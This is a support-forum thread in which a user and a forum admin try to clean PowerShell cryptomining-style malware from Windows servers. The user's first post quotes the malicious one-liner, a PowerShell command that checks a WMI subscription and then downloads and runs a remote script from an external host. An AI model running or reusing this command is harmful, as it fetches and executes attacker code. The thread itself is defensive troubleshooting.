Jump to content

Powershell.exe start to run and get 100% resources


Alvaro

Recommended Posts

Hi, I have to Windows servers (2008 and SBS2011) and both were infected with Y1.bat variant, I run some scripts and apparently I remove them from the system, actually I have Malwarebytes EndPoint installed and from time to time the anti-exploit shows a message blocking some IP address from access, but none people use this server as a workstation.

Now apparently the malware comes again but with a differente variant and when I scan with Malwarebytes no infection appears, I download and Scan with the Anti-Rootkit and nothing appear.

I see that the %temp% folders is redirected to a Temp\1 folder (same as the last time), not sure how to properly remove this thread.

Any suggestion will be appreciated.

Before I discover the following script that I properly remove:

powershell -nop "$a=([string](Get-WMIObject -Namespace root\Subscription -Class __FilterToConsumerBinding ));if(($a -eq $null) -or (!($a.contains('SCM Event Filter')))) {IEX(New-Object Net.WebClient).DownloadString('http://stafftest.spdns.eu:8000/mate6.ps1')}"  

The following link explain how to remove it in the past:

https://community.spiceworks.com/topic/2080003-malicious-powershell-script-causing-100-cpu-load-solved

 

Link to post
Share on other sites

  • Root Admin

Hello @Alvaro and :welcome:

It's quite late for me so I'm off to get some sleep. Will check back on you again sometime tomorrow.

 

Please run the following steps and post back the logs as an attachment when ready.

STEP 01

  • If you're already running Malwarebytes 3 then open Malwarebytes and check for updates. Then click on the Scan tab and select Threat Scan and click on Start Scan button.
  • If you don't have Malwarebytes 3 installed yet please download it from here and install it.
  • Once installed then open Malwarebytes and check for updates. Then click on the Scan tab and select Threat Scan and click on Start Scan button.
  • Once the scan is completed click on the Export Summary button and save the file as a Text file to your desktop or other location you can find, and attach that log on your next reply.
  • If Malwarebytes won't run then please skip to the next step and let me know on your next reply.

STEP 02

Please download AdwCleaner by Malwarebytes and save the file to your Desktop.

  • Right-click on the program and select RunAsAdmin.jpg Run as Administrator to start the tool.
  • Accept the Terms of use.
  • Wait until the database is updated.
  • Click Scan.
  • When finished, please click Clean.
  • Your PC should reboot now if any items were found.
  • After reboot, a log file will be opened. Copy its content into your next reply.

 

RESTART THE COMPUTER Before Running Step 3

STEP 03
Please download the Farbar Recovery Scan Tool and save it to your desktop.

Note: You need to run the version compatible with your system. You can check here if you're not sure if your computer is 32-bit or 64-bit

  • Double-click to run it. When the tool opens, click Yes to disclaimer.
  • Press the Scan button.
  • It will make a log (FRST.txt) in the same directory the tool is run. Please attach it to your reply.
  • The first time the tool is run, it also makes another log (Addition.txt). If you've, run the tool before you need to place a check mark here.
  • Please attach the Additions.txt log to your reply as well.

 

Thanks

Ron

Link to post
Share on other sites

HI thanks for the response but apparently the solution is not working,

I have malwarebytes EndPoint Security running in a SBS 2011 Server, so when I try to install Malwarebytes 3.0 the installer stops because is not for my SO. in the second when I run awcleaner it detects that my DHCP Service is infected, (descripcion attached as a jpg image), and 3rd step is not possible the antivirus eliminate the download once is at downloads folder.

When I start the malwarebytes scanner I choose to detectd PUP and all the checks to try to locate the infection but none is detected, I run Symantec EndPoint Security and same result nothing appears in detections.

I think is a script running in the background under Powershell service but no clue how to detect and stop it.

 

adwcleaner.JPG

Link to post
Share on other sites

  • Root Admin

I'm sorry, was late at night and I didn't read your post correctly.

Yes, please don't install Malwarebytes 3 on the system.

Let me get the logs from Step 3 please. You will need to temporarily disable your antivirus to download them. It is a false positive and the files are very safe and used every day to analyze systems.

Thank you

Ron

Link to post
Share on other sites

  • Root Admin

Please download the attached fixlist.txt file and save it to the Desktop.
NOTE. It's important that both files, FRST or FRST64 and fixlist.txt are in the same location or the fix will not work.

NOTICE: This script was written specifically for this user, for use on this particular machine. Running this on another machine may cause damage to your operating system.

Run FRST or FRST64 and press the Fix button just once and wait.
If the tool needs a restart please make sure you let the system restart normally and let the tool complete its run after restart.
The tool will make a log on the Desktop (Fixlog.txt). Please attach or post it to your next reply.

Note: If the tool warned you about an outdated version please download and run the updated version.

fixlist.txt

Thanks

Ron

 

Link to post
Share on other sites

  • Root Admin

That cleaned up the system a bit. I did remove this task, but it's probably a valid task. You may want to verify and reset the schedule to an off time so as not to affect users during work hours.

Task: {1AF5542F-BA8A-45C2-8252-8200FA7CD56C} - System32\Tasks\Database One Copy Alert => C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NonInteractive -WindowStyle Hidden -command "& 'C:\Program Files\Microsoft\Exchange Server\V14\Scripts\CheckDatabaseRedundancy.ps1' -MonitoringContext -ShowDetailedErrors -ErrorAction:Continue"

 

 

Link to post
Share on other sites

 

Hi, thanks for your effort but the problem continues, malwarebytes continue giving the message "site blocked site due a potencial malicius to ip: xxx.xxx.xxx.xx" is very strange too that if I try to go to %temp% I go to c:\temp\1 but my temp file is at c:\temp if I try to delete all temp files there is always some in use but I can not delete the "1" folder.

Link to post
Share on other sites

Guest
This topic is now closed to further replies.
  • Recently Browsing   0 members

    • No registered users viewing this page.
Back to top
×
×
  • Create New...

Important Information

This site uses cookies - We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.